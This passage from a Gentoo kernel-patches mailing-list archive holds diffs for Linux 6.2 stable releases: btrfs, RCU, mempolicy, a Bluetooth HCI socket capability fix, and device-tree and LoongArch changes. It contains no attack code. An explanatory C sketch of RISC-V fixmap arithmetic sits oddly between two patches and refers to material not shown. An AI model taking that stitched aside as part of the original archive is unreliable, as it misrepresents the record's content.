+ 	{ USB_DEVICE_AND_INTERFACE_INFO(OPPO_VENDOR_ID, OPPO_PRODUCT_R11, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0, 0) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(UNISOC_VENDOR_ID, TOZED_PRODUCT_LT70C, 0xff, 0, 0) },
+ 	{ } /* Terminating entry */
+ };
+ MODULE_DEVICE_TABLE(usb, option_ids);
+diff --git a/fs/btrfs/send.c b/fs/btrfs/send.c
+index d50182b6deec8..614baded39639 100644
+--- a/fs/btrfs/send.c
++++ b/fs/btrfs/send.c
+@@ -1892,7 +1892,7 @@ static int get_cur_inode_state(struct send_ctx *sctx, u64 ino, u64 gen)
+ 	int left_ret;
+ 	int right_ret;
+ 	u64 left_gen;
+-	u64 right_gen;
++	u64 right_gen = 0;
+ 	struct btrfs_inode_info info;
+ 
+ 	ret = get_inode_info(sctx->send_root, ino, &info);
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index fe652f8fc697b..3f65e37dbd6a5 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -2618,7 +2618,7 @@ int btrfs_init_new_device(struct btrfs_fs_info *fs_info, const char *device_path
+ 	struct block_device *bdev;
+ 	struct super_block *sb = fs_info->sb;
+ 	struct btrfs_fs_devices *fs_devices = fs_info->fs_devices;
+-	struct btrfs_fs_devices *seed_devices;
++	struct btrfs_fs_devices *seed_devices = NULL;
+ 	u64 orig_super_total_bytes;
+ 	u64 orig_super_num_devices;
+ 	int ret = 0;
+diff --git a/include/linux/mmc/sdio_ids.h b/include/linux/mmc/sdio_ids.h
+index 74f9d9a6d3307..f0cf9c5d6502a 100644
+--- a/include/linux/mmc/sdio_ids.h
++++ b/include/linux/mmc/sdio_ids.h
+@@ -74,10 +74,13 @@
+ #define SDIO_DEVICE_ID_BROADCOM_43362		0xa962
+ #define SDIO_DEVICE_ID_BROADCOM_43364		0xa9a4
+ #define SDIO_DEVICE_ID_BROADCOM_43430		0xa9a6
+-#define SDIO_DEVICE_ID_BROADCOM_CYPRESS_43439	0xa9af
++#define SDIO_DEVICE_ID_BROADCOM_43439		0xa9af
+ #define SDIO_DEVICE_ID_BROADCOM_43455		0xa9bf
+ #define SDIO_DEVICE_ID_BROADCOM_CYPRESS_43752	0xaae8
+ 
++#define SDIO_VENDOR_ID_CYPRESS			0x04b4
++#define SDIO_DEVICE_ID_BROADCOM_CYPRESS_43439	0xbd3d
++
+ #define SDIO_VENDOR_ID_MARVELL			0x02df
+ #define SDIO_DEVICE_ID_MARVELL_LIBERTAS		0x9103
+ #define SDIO_DEVICE_ID_MARVELL_8688_WLAN	0x9104
+diff --git a/kernel/rcu/tree.c b/kernel/rcu/tree.c
+index cf34a961821ad..5221291937713 100644
+--- a/kernel/rcu/tree.c
++++ b/kernel/rcu/tree.c
+@@ -3131,6 +3131,18 @@ need_offload_krc(struct kfree_rcu_cpu *krcp)
+ 	return !!krcp->head;
+ }
+ 
++static bool
++need_wait_for_krwp_work(struct kfree_rcu_cpu_work *krwp)
++{
++	int i;
++
++	for (i = 0; i < FREE_N_CHANNELS; i++)
++		if (krwp->bkvhead_free[i])
++			return true;
++
++	return !!krwp->head_free;
++}
++
+ static void
+ schedule_delayed_monitor_work(struct kfree_rcu_cpu *krcp)
+ {
+@@ -3162,14 +3174,13 @@ static void kfree_rcu_monitor(struct work_struct *work)
+ 	for (i = 0; i < KFREE_N_BATCHES; i++) {
+ 		struct kfree_rcu_cpu_work *krwp = &(krcp->krw_arr[i]);
+ 
+-		// Try to detach bkvhead or head and attach it over any
+-		// available corresponding free channel. It can be that
+-		// a previous RCU batch is in progress, it means that
+-		// immediately to queue another one is not possible so
+-		// in that case the monitor work is rearmed.
+-		if ((krcp->bkvhead[0] && !krwp->bkvhead_free[0]) ||
+-			(krcp->bkvhead[1] && !krwp->bkvhead_free[1]) ||
+-				(krcp->head && !krwp->head_free)) {
++		// Try to detach bulk_head or head and attach it, but only when
++		// all channels are free. If any channel is not free, krwp still
++		// has on-going RCU work to handle its free business.
++		if (need_wait_for_krwp_work(krwp))
++			continue;
++
++		if (need_offload_krc(krcp)) {
+ 			// Channel 1 corresponds to the SLAB-pointer bulk path.
+ 			// Channel 2 corresponds to vmalloc-pointer bulk path.
+ 			for (j = 0; j < FREE_N_CHANNELS; j++) {
+diff --git a/mm/mempolicy.c b/mm/mempolicy.c
+index f940395667c82..e132f70a059e8 100644
+--- a/mm/mempolicy.c
++++ b/mm/mempolicy.c
+@@ -784,70 +784,56 @@ static int vma_replace_policy(struct vm_area_struct *vma,
+ 	return err;
+ }
+ 
+-/* Step 2: apply policy to a range and do splits. */
+-static int mbind_range(struct mm_struct *mm, unsigned long start,
+-		       unsigned long end, struct mempolicy *new_pol)
++/* Split or merge the VMA (if required) and apply the new policy */
++static int mbind_range(struct vma_iterator *vmi, struct vm_area_struct *vma,
++		struct vm_area_struct **prev, unsigned long start,
++		unsigned long end, struct mempolicy *new_pol)
+ {
+-	MA_STATE(mas, &mm->mm_mt, start, start);
+-	struct vm_area_struct *prev;
+-	struct vm_area_struct *vma;
+-	int err = 0;
++	struct vm_area_struct *merged;
++	unsigned long vmstart, vmend;
+ 	pgoff_t pgoff;
++	int err;
+ 
+-	prev = mas_prev(&mas, 0);
+-	if (unlikely(!prev))
+-		mas_set(&mas, start);
++	vmend = min(end, vma->vm_end);
++	if (start > vma->vm_start) {
++		*prev = vma;
++		vmstart = start;
++	} else {
++		vmstart = vma->vm_start;
++	}
+ 
+-	vma = mas_find(&mas, end - 1);
+-	if (WARN_ON(!vma))
++	if (mpol_equal(vma_policy(vma), new_pol))
+ 		return 0;
+ 
+-	if (start > vma->vm_start)
+-		prev = vma;
+-
+-	for (; vma; vma = mas_next(&mas, end - 1)) {
+-		unsigned long vmstart = max(start, vma->vm_start);
+-		unsigned long vmend = min(end, vma->vm_end);
+-
+-		if (mpol_equal(vma_policy(vma), new_pol))
+-			goto next;
+-
+-		pgoff = vma->vm_pgoff +
+-			((vmstart - vma->vm_start) >> PAGE_SHIFT);
+-		prev = vma_merge(mm, prev, vmstart, vmend, vma->vm_flags,
+-				 vma->anon_vma, vma->vm_file, pgoff,
+-				 new_pol, vma->vm_userfaultfd_ctx,
+-				 anon_vma_name(vma));
+-		if (prev) {
+-			/* vma_merge() invalidated the mas */
+-			mas_pause(&mas);
+-			vma = prev;
+-			goto replace;
+-		}
+-		if (vma->vm_start != vmstart) {
+-			err = split_vma(vma->vm_mm, vma, vmstart, 1);
+-			if (err)
+-				goto out;
+-			/* split_vma() invalidated the mas */
+-			mas_pause(&mas);
+-		}
+-		if (vma->vm_end != vmend) {
+-			err = split_vma(vma->vm_mm, vma, vmend, 0);
+-			if (err)
+-				goto out;
+-			/* split_vma() invalidated the mas */
+-			mas_pause(&mas);
+-		}
+-replace:
+-		err = vma_replace_policy(vma, new_pol);
++	pgoff = vma->vm_pgoff + ((vmstart - vma->vm_start) >> PAGE_SHIFT);
++	merged = vma_merge(vma->vm_mm, *prev, vmstart, vmend, vma->vm_flags,
++			   vma->anon_vma, vma->vm_file, pgoff, new_pol,
++			   vma->vm_userfaultfd_ctx, anon_vma_name(vma));
++	if (merged) {
++		*prev = merged;
++		/* vma_merge() invalidated the mas */
++		mas_pause(&vmi->mas);
++		return vma_replace_policy(merged, new_pol);
++	}
++
++	if (vma->vm_start != vmstart) {
++		err = split_vma(vma->vm_mm, vma, vmstart, 1);
+ 		if (err)
+-			goto out;
+-next:
+-		prev = vma;
++			return err;
++		/* split_vma() invalidated the mas */
++		mas_pause(&vmi->mas);
+ 	}
+ 
+-out:
+-	return err;
++	if (vma->vm_end != vmend) {
++		err = split_vma(vma->vm_mm, vma, vmend, 0);
++		if (err)
++			return err;
++		/* split_vma() invalidated the mas */
++		mas_pause(&vmi->mas);
++	}
++
++	*prev = vma;
++	return vma_replace_policy(vma, new_pol);
+ }
+ 
+ /* Set the process memory policy */
+@@ -1259,6 +1245,8 @@ static long do_mbind(unsigned long start, unsigned long len,
+ 		     nodemask_t *nmask, unsigned long flags)
+ {
+ 	struct mm_struct *mm = current->mm;
++	struct vm_area_struct *vma, *prev;
++	struct vma_iterator vmi;
+ 	struct mempolicy *new;
+ 	unsigned long end;
+ 	int err;
+@@ -1328,7 +1316,13 @@ static long do_mbind(unsigned long start, unsigned long len,
+ 		goto up_out;
+ 	}
+ 
+-	err = mbind_range(mm, start, end, new);
++	vma_iter_init(&vmi, mm, start);
++	prev = vma_prev(&vmi);
++	for_each_vma_range(vmi, vma, end) {
++		err = mbind_range(&vmi, vma, &prev, start, end, new);
++		if (err)
++			break;
++	}
+ 
+ 	if (!err) {
+ 		int nr_failed = 0;
+@@ -1489,10 +1483,8 @@ SYSCALL_DEFINE4(set_mempolicy_home_node, unsigned long, start, unsigned long, le
+ 		unsigned long, home_node, unsigned long, flags)
+ {
+ 	struct mm_struct *mm = current->mm;
+-	struct vm_area_struct *vma;
++	struct vm_area_struct *vma, *prev;
+ 	struct mempolicy *new;
+-	unsigned long vmstart;
+-	unsigned long vmend;
+ 	unsigned long end;
+ 	int err = -ENOENT;
+ 	VMA_ITERATOR(vmi, mm, start);
+@@ -1521,9 +1513,8 @@ SYSCALL_DEFINE4(set_mempolicy_home_node, unsigned long, start, unsigned long, le
+ 	if (end == start)
+ 		return 0;
+ 	mmap_write_lock(mm);
++	prev = vma_prev(&vmi);
+ 	for_each_vma_range(vmi, vma, end) {
+-		vmstart = max(start, vma->vm_start);
+-		vmend   = min(end, vma->vm_end);
+ 		new = mpol_dup(vma_policy(vma));
+ 		if (IS_ERR(new)) {
+ 			err = PTR_ERR(new);
+@@ -1547,7 +1538,7 @@ SYSCALL_DEFINE4(set_mempolicy_home_node, unsigned long, start, unsigned long, le
+ 		}
+ 
+ 		new->home_node = home_node;
+-		err = mbind_range(mm, vmstart, vmend, new);
++		err = mbind_range(&vmi, vma, &prev, start, end, new);
+ 		mpol_put(new);
+ 		if (err)
+ 			break;
+diff --git a/net/bluetooth/hci_sock.c b/net/bluetooth/hci_sock.c
+index 06581223238c5..f597fe0db9f8f 100644
+--- a/net/bluetooth/hci_sock.c
++++ b/net/bluetooth/hci_sock.c
+@@ -1003,7 +1003,14 @@ static int hci_sock_ioctl(struct socket *sock, unsigned int cmd,
+ 	if (hci_sock_gen_cookie(sk)) {
+ 		struct sk_buff *skb;
+ 
+-		if (capable(CAP_NET_ADMIN))
++		/* Perform careful checks before setting the HCI_SOCK_TRUSTED
++		 * flag. Make sure that not only the current task but also
++		 * the socket opener has the required capability, since
++		 * privileged programs can be tricked into making ioctl calls
++		 * on HCI sockets, and the socket should not be marked as
++		 * trusted simply because the ioctl caller is privileged.
++		 */
++		if (sk_capable(sk, CAP_NET_ADMIN))
+ 			hci_sock_set_flag(sk, HCI_SOCK_TRUSTED);
+ 
+ 		/* Send event to monitor */


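For background on the fixmap arithmetic this patch relies on: fixmap slots
are allocated downward from FIXADDR_TOP, one page per enum index, so placing
FIX_FDT_END/FIX_FDT ahead of FIX_PTE grows the documented fixmap window from
2 MB to 6 MB. A rough standalone sketch follows (illustration only, not from
the patch; it assumes the generic __fix_to_virt() formula,
FIXADDR_TOP - (idx << PAGE_SHIFT), plus the SV39 constants from the vm-layout
table above):

  #include <stdio.h>
  #include <stdint.h>

  #define PAGE_SHIFT   12
  #define PAGE_SIZE    (1ULL << PAGE_SHIFT)
  #define PMD_SIZE     (1ULL << 21)                  /* 2 MiB */
  #define MAX_FDT_SIZE PMD_SIZE
  #define FIX_FDT_SIZE (MAX_FDT_SIZE + (2ULL << 20)) /* MAX_FDT_SIZE + SZ_2M */

  /* SV39 value from the vm-layout table: the fixmap ends where PCI io begins. */
  #define FIXADDR_TOP  0xffffffc6ff000000ULL

  /* asm-generic/fixmap.h rule: slots grow downward, one page per index. */
  static uint64_t fix_to_virt(unsigned int idx)
  {
          return FIXADDR_TOP - ((uint64_t)idx << PAGE_SHIFT);
  }

  int main(void)
  {
          /* Mirrors the new enum layout: FIX_HOLE = 0, then the FDT slots. */
          unsigned int fix_fdt_end = 1;
          unsigned int fix_fdt = fix_fdt_end + FIX_FDT_SIZE / PAGE_SIZE - 1;

          printf("FIX_FDT index %u -> va 0x%llx\n", fix_fdt,
                 (unsigned long long)fix_to_virt(fix_fdt));
          /* The PMD alignment the new BUILD_BUG_ON() enforces: */
          printf("PMD aligned: %s\n",
                 fix_fdt % (PMD_SIZE / PAGE_SIZE) ? "no" : "yes");
          return 0;
  }

With FIX_FDT_SIZE = 4 MB this lands FIX_FDT at index 1024, i.e.
0xffffffc6fec00000, and 1024 is a multiple of PMD_SIZE / PAGE_SIZE = 512,
which is exactly the alignment the new BUILD_BUG_ON() asserts.
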
^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-04-26 13:21 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-04-26 13:21 UTC (permalink / raw
  To: gentoo-commits

commit:     c42d70276b33abe1ce8f83d8422b7676bdf0480e
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Apr 26 13:21:21 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Apr 26 13:21:21 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=c42d7027

Linux patch 6.2.13

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1012_linux-6.2.13.patch | 3619 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 3623 insertions(+)

diff --git a/0000_README b/0000_README
index 3bd4fbeb..bb52a583 100644
--- a/0000_README
+++ b/0000_README
@@ -91,6 +91,10 @@ Patch:  1011_linux-6.2.12.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.12
 
+Patch:  1012_linux-6.2.13.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.13
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1012_linux-6.2.13.patch b/1012_linux-6.2.13.patch
new file mode 100644
index 00000000..10b101ec
--- /dev/null
+++ b/1012_linux-6.2.13.patch
@@ -0,0 +1,3619 @@
+diff --git a/Documentation/admin-guide/kernel-parameters.rst b/Documentation/admin-guide/kernel-parameters.rst
+index 959f73a327126..426440f5d79f2 100644
+--- a/Documentation/admin-guide/kernel-parameters.rst
++++ b/Documentation/admin-guide/kernel-parameters.rst
+@@ -128,6 +128,7 @@ parameter is applicable::
+ 	KVM	Kernel Virtual Machine support is enabled.
+ 	LIBATA  Libata driver is enabled
+ 	LP	Printer support is enabled.
++	LOONGARCH LoongArch architecture is enabled.
+ 	LOOP	Loopback device support is enabled.
+ 	M68k	M68k architecture is enabled.
+ 			These options have more detailed description inside of
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 6cfa6e3996cf7..8cf1595545ac2 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -6874,6 +6874,12 @@
+ 			When enabled, memory and cache locality will be
+ 			impacted.
+ 
++	writecombine=	[LOONGARCH] Control the MAT (Memory Access Type) of
++			ioremap_wc().
++
++			on   - Enable writecombine, use WUC for ioremap_wc()
++			off  - Disable writecombine, use SUC for ioremap_wc()
++
+ 	x2apic_phys	[X86-64,APIC] Use x2apic physical mode instead of
+ 			default x2apic cluster mode on platforms
+ 			supporting x2apic.
+diff --git a/Makefile b/Makefile
+index 068374cc26018..f76a4a63aaf5a 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 12
++SUBLEVEL = 13
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/rk3288.dtsi b/arch/arm/boot/dts/rk3288.dtsi
+index 2ca76b69add78..511ca864c1b2d 100644
+--- a/arch/arm/boot/dts/rk3288.dtsi
++++ b/arch/arm/boot/dts/rk3288.dtsi
+@@ -942,7 +942,7 @@
+ 		status = "disabled";
+ 	};
+ 
+-	spdif: sound@ff88b0000 {
++	spdif: sound@ff8b0000 {
+ 		compatible = "rockchip,rk3288-spdif", "rockchip,rk3066-spdif";
+ 		reg = <0x0 0xff8b0000 0x0 0x10000>;
+ 		#sound-dai-cells = <0>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi b/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
+index c063a144e0e7b..42027c78c8ded 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
+@@ -1571,15 +1571,20 @@
+ 
+ 			dmc: bus@38000 {
+ 				compatible = "simple-bus";
+-				reg = <0x0 0x38000 0x0 0x400>;
+ 				#address-cells = <2>;
+ 				#size-cells = <2>;
+-				ranges = <0x0 0x0 0x0 0x38000 0x0 0x400>;
++				ranges = <0x0 0x0 0x0 0x38000 0x0 0x2000>;
+ 
+ 				canvas: video-lut@48 {
+ 					compatible = "amlogic,canvas";
+ 					reg = <0x0 0x48 0x0 0x14>;
+ 				};
++
++				pmu: pmu@80 {
++					reg = <0x0 0x80 0x0 0x40>,
++					      <0x0 0xc00 0x0 0x40>;
++					interrupts = <GIC_SPI 52 IRQ_TYPE_EDGE_RISING>;
++				};
+ 			};
+ 
+ 			usb2_phy1: phy@3a000 {
+@@ -1705,12 +1710,6 @@
+ 			};
+ 		};
+ 
+-		pmu: pmu@ff638000 {
+-			reg = <0x0 0xff638000 0x0 0x100>,
+-			      <0x0 0xff638c00 0x0 0x100>;
+-			interrupts = <GIC_SPI 52 IRQ_TYPE_EDGE_RISING>;
+-		};
+-
+ 		aobus: bus@ff800000 {
+ 			compatible = "simple-bus";
+ 			reg = <0x0 0xff800000 0x0 0x100000>;
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-evk.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-evk.dtsi
+index e0b604ac0da4f..85661825b8386 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-evk.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-evk.dtsi
+@@ -194,7 +194,7 @@
+ 		rohm,reset-snvs-powered;
+ 
+ 		#clock-cells = <0>;
+-		clocks = <&osc_32k 0>;
++		clocks = <&osc_32k>;
+ 		clock-output-names = "clk-32k-out";
+ 
+ 		regulators {
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
+index 702d87621bb43..1381b9ce3d5ee 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
+@@ -95,7 +95,7 @@
+ 		compatible = "regulator-fixed";
+ 		enable-active-high;
+ 		gpio = <&gpio2 20 GPIO_ACTIVE_HIGH>; /* PMIC_EN_ETH */
+-		off-on-delay = <500000>;
++		off-on-delay-us = <500000>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_reg_eth>;
+ 		regulator-always-on;
+@@ -135,7 +135,7 @@
+ 		enable-active-high;
+ 		/* Verdin SD_1_PWR_EN (SODIMM 76) */
+ 		gpio = <&gpio3 5 GPIO_ACTIVE_HIGH>;
+-		off-on-delay = <100000>;
++		off-on-delay-us = <100000>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_usdhc2_pwr_en>;
+ 		regulator-max-microvolt = <3300000>;
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp-verdin-dev.dtsi b/arch/arm64/boot/dts/freescale/imx8mp-verdin-dev.dtsi
+index cefabe65b2520..c8b521d45fca1 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp-verdin-dev.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mp-verdin-dev.dtsi
+@@ -12,7 +12,7 @@
+ 		compatible = "regulator-fixed";
+ 		enable-active-high;
+ 		gpio = <&gpio_expander_21 4 GPIO_ACTIVE_HIGH>; /* ETH_PWR_EN */
+-		off-on-delay = <500000>;
++		off-on-delay-us = <500000>;
+ 		regulator-max-microvolt = <3300000>;
+ 		regulator-min-microvolt = <3300000>;
+ 		regulator-name = "+V3.3_ETH";
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp-verdin.dtsi b/arch/arm64/boot/dts/freescale/imx8mp-verdin.dtsi
+index 6a1890a4b5d88..947e4537303f2 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp-verdin.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mp-verdin.dtsi
+@@ -87,7 +87,7 @@
+ 		compatible = "regulator-fixed";
+ 		enable-active-high;
+ 		gpio = <&gpio2 20 GPIO_ACTIVE_HIGH>; /* PMIC_EN_ETH */
+-		off-on-delay = <500000>;
++		off-on-delay-us = <500000>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_reg_eth>;
+ 		regulator-always-on;
+@@ -128,7 +128,7 @@
+ 		enable-active-high;
+ 		/* Verdin SD_1_PWR_EN (SODIMM 76) */
+ 		gpio = <&gpio4 22 GPIO_ACTIVE_HIGH>;
+-		off-on-delay = <100000>;
++		off-on-delay-us = <100000>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_usdhc2_pwr_en>;
+ 		regulator-max-microvolt = <3300000>;
+diff --git a/arch/arm64/boot/dts/qcom/ipq8074-hk01.dts b/arch/arm64/boot/dts/qcom/ipq8074-hk01.dts
+index ca3f96646b90d..5cf07caf41033 100644
+--- a/arch/arm64/boot/dts/qcom/ipq8074-hk01.dts
++++ b/arch/arm64/boot/dts/qcom/ipq8074-hk01.dts
+@@ -62,11 +62,11 @@
+ 	perst-gpios = <&tlmm 58 GPIO_ACTIVE_LOW>;
+ };
+ 
+-&pcie_phy0 {
++&pcie_qmp0 {
+ 	status = "okay";
+ };
+ 
+-&pcie_phy1 {
++&pcie_qmp1 {
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/qcom/ipq8074-hk10.dtsi b/arch/arm64/boot/dts/qcom/ipq8074-hk10.dtsi
+index 651a231554e0b..1b8379ba87f9c 100644
+--- a/arch/arm64/boot/dts/qcom/ipq8074-hk10.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq8074-hk10.dtsi
+@@ -48,11 +48,11 @@
+ 	perst-gpios = <&tlmm 61 GPIO_ACTIVE_LOW>;
+ };
+ 
+-&pcie_phy0 {
++&pcie_qmp0 {
+ 	status = "okay";
+ };
+ 
+-&pcie_phy1 {
++&pcie_qmp1 {
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp-pmics.dtsi b/arch/arm64/boot/dts/qcom/sc8280xp-pmics.dtsi
+index f2c0b71b5d8e8..896a6925bbc32 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp-pmics.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc8280xp-pmics.dtsi
+@@ -59,8 +59,9 @@
+ 		#size-cells = <0>;
+ 
+ 		pmk8280_pon: pon@1300 {
+-			compatible = "qcom,pm8998-pon";
+-			reg = <0x1300>;
++			compatible = "qcom,pmk8350-pon";
++			reg = <0x1300>, <0x800>;
++			reg-names = "hlos", "pbs";
+ 
+ 			pmk8280_pon_pwrkey: pwrkey {
+ 				compatible = "qcom,pmk8350-pwrkey";
+diff --git a/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi b/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi
+index ce7165d7f1a14..102e448bc026a 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi
+@@ -598,7 +598,7 @@
+ 	non-removable;
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&sdmmc1_bus4 &sdmmc1_cmd &sdmmc1_clk>;
+-	sd-uhs-sdr104;
++	sd-uhs-sdr50;
+ 	vmmc-supply = <&vcc3v3_sys>;
+ 	vqmmc-supply = <&vcc_1v8>;
+ 	status = "okay";
+diff --git a/arch/arm64/include/asm/kvm_host.h b/arch/arm64/include/asm/kvm_host.h
+index 35a159d131b5f..307a840b78865 100644
+--- a/arch/arm64/include/asm/kvm_host.h
++++ b/arch/arm64/include/asm/kvm_host.h
+@@ -533,9 +533,22 @@ struct kvm_vcpu_arch {
+ 	({							\
+ 		__build_check_flag(v, flagset, f, m);		\
+ 								\
+-		v->arch.flagset & (m);				\
++		READ_ONCE(v->arch.flagset) & (m);		\
+ 	})
+ 
++/*
++ * Note that the set/clear accessors must be preempt-safe in order to
++ * avoid nesting them with load/put which also manipulate flags...
++ */
++#ifdef __KVM_NVHE_HYPERVISOR__
++/* the nVHE hypervisor is always non-preemptible */
++#define __vcpu_flags_preempt_disable()
++#define __vcpu_flags_preempt_enable()
++#else
++#define __vcpu_flags_preempt_disable()	preempt_disable()
++#define __vcpu_flags_preempt_enable()	preempt_enable()
++#endif
++
+ #define __vcpu_set_flag(v, flagset, f, m)			\
+ 	do {							\
+ 		typeof(v->arch.flagset) *fset;			\
+@@ -543,9 +556,11 @@ struct kvm_vcpu_arch {
+ 		__build_check_flag(v, flagset, f, m);		\
+ 								\
+ 		fset = &v->arch.flagset;			\
++		__vcpu_flags_preempt_disable();			\
+ 		if (HWEIGHT(m) > 1)				\
+ 			*fset &= ~(m);				\
+ 		*fset |= (f);					\
++		__vcpu_flags_preempt_enable();			\
+ 	} while (0)
+ 
+ #define __vcpu_clear_flag(v, flagset, f, m)			\
+@@ -555,7 +570,9 @@ struct kvm_vcpu_arch {
+ 		__build_check_flag(v, flagset, f, m);		\
+ 								\
+ 		fset = &v->arch.flagset;			\
++		__vcpu_flags_preempt_disable();			\
+ 		*fset &= ~(m);					\
++		__vcpu_flags_preempt_enable();			\
+ 	} while (0)
+ 
+ #define vcpu_get_flag(v, ...)	__vcpu_get_flag((v), __VA_ARGS__)
+diff --git a/arch/arm64/kvm/hypercalls.c b/arch/arm64/kvm/hypercalls.c
+index c9f401fa01a93..950e35b993d2b 100644
+--- a/arch/arm64/kvm/hypercalls.c
++++ b/arch/arm64/kvm/hypercalls.c
+@@ -397,6 +397,8 @@ int kvm_arm_set_fw_reg(struct kvm_vcpu *vcpu, const struct kvm_one_reg *reg)
+ 	u64 val;
+ 	int wa_level;
+ 
++	if (KVM_REG_SIZE(reg->id) != sizeof(val))
++		return -ENOENT;
+ 	if (copy_from_user(&val, uaddr, KVM_REG_SIZE(reg->id)))
+ 		return -EFAULT;
+ 
+diff --git a/arch/loongarch/Kconfig b/arch/loongarch/Kconfig
+index 9cc8b84f7eb03..e349cc9e3c228 100644
+--- a/arch/loongarch/Kconfig
++++ b/arch/loongarch/Kconfig
+@@ -94,6 +94,7 @@ config LOONGARCH
+ 	select HAVE_DYNAMIC_FTRACE_WITH_ARGS
+ 	select HAVE_DYNAMIC_FTRACE_WITH_REGS
+ 	select HAVE_EBPF_JIT
++	select HAVE_EFFICIENT_UNALIGNED_ACCESS if !ARCH_STRICT_ALIGN
+ 	select HAVE_EXIT_THREAD
+ 	select HAVE_FAST_GUP
+ 	select HAVE_FTRACE_MCOUNT_RECORD
+@@ -441,6 +442,40 @@ config ARCH_IOREMAP
+ 	  protection support. However, you can enable LoongArch DMW-based
+ 	  ioremap() for better performance.
+ 
++config ARCH_WRITECOMBINE
++	bool "Enable WriteCombine (WUC) for ioremap()"
++	help
++	  LoongArch maintains cache coherency in hardware, but when paired
++	  with LS7A chipsets the WUC attribute (Weak-ordered UnCached, which
++	  is similar to WriteCombine) is outside the scope of the cache
++	  coherency mechanism for PCIe devices (this is a PCIe protocol
++	  violation, which may be fixed in newer chipsets).
++
++	  This means WUC can only be used for write-only memory regions now,
++	  so this option is disabled by default, making WUC silently fall back
++	  to SUC for ioremap(). You can enable this option if the kernel is
++	  guaranteed to run on hardware without this bug.
++
++	  You can override this setting via writecombine=on/off boot parameter.
++
++config ARCH_STRICT_ALIGN
++	bool "Enable -mstrict-align to prevent unaligned accesses" if EXPERT
++	default y
++	help
++	  Not all LoongArch cores support h/w unaligned access, so we can use
++	  the -mstrict-align build parameter to prevent unaligned accesses.
++
++	  CPUs with h/w unaligned access support:
++	  Loongson-2K2000/2K3000/3A5000/3C5000/3D5000.
++
++	  CPUs without h/w unaligned access support:
++	  Loongson-2K500/2K1000.
++
++	  This option is enabled by default so the kernel can run on all
++	  LoongArch systems. But you can disable it manually if you want to
++	  run the kernel only on systems with h/w unaligned access support in
++	  order to optimise for performance.
++
+ config KEXEC
+ 	bool "Kexec system call"
+ 	select KEXEC_CORE
+diff --git a/arch/loongarch/Makefile b/arch/loongarch/Makefile
+index 4402387d27551..6e1c931a8507e 100644
+--- a/arch/loongarch/Makefile
++++ b/arch/loongarch/Makefile
+@@ -91,10 +91,15 @@ KBUILD_CPPFLAGS += -DVMLINUX_LOAD_ADDRESS=$(load-y)
+ # instead of .eh_frame so we don't discard them.
+ KBUILD_CFLAGS += -fno-asynchronous-unwind-tables
+ 
